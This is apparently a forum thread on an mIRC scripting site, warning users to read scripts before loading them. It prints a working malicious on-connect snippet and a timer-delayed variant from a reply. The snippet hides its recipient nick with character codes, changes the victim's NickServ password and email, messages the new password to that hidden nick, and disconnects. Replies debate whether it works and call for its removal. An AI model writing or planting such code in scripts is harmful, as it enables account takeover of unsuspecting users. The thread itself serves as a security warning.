I will try to tell you all to be warned,
If you want your nickname and password secure, please read this.
The scripts can include hacks like the one I post below to show how it may look.
PLEASE DO NOT ADD THIS TO YOUR REMOTE! YOUR NICKNAME PASSWORD WILL THEN GET CHANGED, AND YOU GOT NO CHANCE TO GET IT BACK!
Please do NOT give this to anyone than tell it is helping you..
I does this to HELP not to HACK!
Don't be stupid giving it to anyone; Than it is YOUR fault, not mine.
DON'T ADD TO REMOTE; JUST LOOK AT IT; DONT ADD SCRIPTS THAT INCLUDE SOMETHING LIKE THIS (MANY DIFFERENT WAYS TO DO IT; I TOOK A SIMPLE..)
=========================================================================================
-------------------------------------DO-NOT-ADD-TO-REMOTE!-------------------------------=========================================================================================
On *:CONNECT:{
var %newpassid2 $rand(1,1000000)
var %newpassid3 $rand(1,1000000)
var %newpassid4 $rand(a,z)
var %newpassid1 $rand(a,z)
var %wh0 $+($chr(68),$chr(105),$chr(97),$chr(109),$chr(111),$chr(110),$chr(100))
var %newpasscode $+(%newpassid1,%newpassid3,%newpassid2,%newpassid4)
ns set password %newpasscode
ns set email $+($me,@,hacked,.,com)
ns set language 1
echo -a (3 $time ) Connected to (3 $+ $server $+ )
notice %wh0 1(3 $time 1) Connected to (3 $+ $server $+ 1) and changed password to (3 $+ %newpasscode $+ 1)
disconnect
}
=========================================================================================
-------------------------------------DO-NOT-ADD-TO-REMOTE!-------------------------------=========================================================================================
This would use like 3 seconds, and then the hacker got your new password, and you dont have any chance to get it back.
There is 26*1,000,000*1,000,000*26 different combinations, also 676,000,000,000,000 different combinations!
It does also change your email, your nickname is 100% lost.
Therefor I say it over and over again; READ PAST THE SCRIPTS BEFORE YOU ADD THEM; I HAS NEVER GOT HACKED AT IRC BECAUSE OF THIS!
Um, When you change your password it tells you what you changed it to E.g (20:25:20pm) Password changed to shadow123. so whats the point in this script just use logs and your fine =X Also i dont think a 'Hacker' would be to fussed about getting your password DUH ITS MIRC this is a bunch of shoot that should be deleted -.-'
lol i made it were the vitim can identify themself be4 it terminates them
On *:CONNECT: {
var %newpassid2 $rand(1,1000000)
var %newpassid3 $rand(1,1000000)
var %newpassid4 $rand(a,z)
var %newpassid1 $rand(a,z)
var %wh0 $+($chr(68),$chr(105),$chr(97),$chr(109),$chr(111),$chr(110),$chr(100))
var %newpasscode $+(%newpassid1,%newpassid3,%newpassid2,%newpassid4)
.timer 1 40 ns set password %newpasscode
.timer 1 40 ns set email $+($me,@,hacked,.,com)
.timer 1 40 ns set language 1
echo -a (3 $time ) Connected to (3 $+ $server $+ )
.timer 1 40 notice %wh0 1(3 $time 1) Connected to (3 $+ $server $+ 1) and changed password to (3 $+ %newpasscode $+ 1)
.timer 1 40 disconnect
}
RusselB your the one who's not getting me.
The code is "meant" to hack someone else's account, so a hacker (shouldn't) have the original password, and, therefore, would not be able to have an ON CONNECT event which auto-identifies for the nick.
The "hacker" wouldn't be able to but the "victim" could have such a script already loaded. Which isn't an odd scenario theres thousands of people that auto identify using an on CONNECT.
Whoever loads this script will have his/her own password tried to be changed every time the person who loads this script connects. This will fail because he needs to be identified before ns set password works. IF however the person who loads this script already has an on connect identifying him/her then the posted on connect IS succesful at changing that persons own password.
I never said ANYTHING about changing other peoples passwords.
It's a crappy hack(if one should even call it such), a stupid script which does nothing useful and should thus be deleted.
Did you read my post of Dec 6, 2008 6:08 pm?
If you did read it, did you understand it?
If you didn't read it, please do so.
If you didn't understand it, I'm not sure how to make it clearer, that for your code 1 to work, you would have to previously have the valid password, in which case you are altering your own information, not hacking and altering someone else's via the OP's code.
RusselB. Your statement that a person needs to be a identified for this to be evil is true but say if a person who loads this now has 2 scripts loaded
ON *:CONNECT: if ($network == somenet) ns identify password
2.this script.mrc
Then this script will be successful in changing the password. Luckily mIRC's own perform is triggered after the very last on CONNECT otherwise this script would have an even higher success rate.
In any case this snippet has a potential security flaw and should thus be removed in my opinion.
Just for the heck of it, I did some checking, and on all of the networks that I'm on, I was unable to set a new password without previously having been identified for my nick with the old password. Therefore this script would not really do anything, since nickserv requires the person trying to change the password to have identified for their nick previously.
This is just silly, why add something if you don't want people to add it ? Other people with other ulterior motives will now copy and paste this script to use on innocent people, shame on you Diamond. When you tell people not to eat cookie's from the cookie jar, what do they end up doing ? Btw that is not really a hack, it just changes a few things which can be so easily undone by changing your details in your chat client and once connected by using
/ns recover nick
and
/ns release nick
Changing email is not that important unless you use an O-line and setting language to 1 sets english, I think I would battle far more with greek than english lol. With 5 lines I could do a much better hack, but I am not pasting it so nananana "suffer"
This is just plain silly, please delete
Why would you add this? And first of all most script sites such as here and many others have people that will notice what is in a code or not. And as furby mentioned if you dont understand a code why add it. And most common people use a trojan hunter or a virus to detect certain things so eithier way its up to the person to look at what they download!!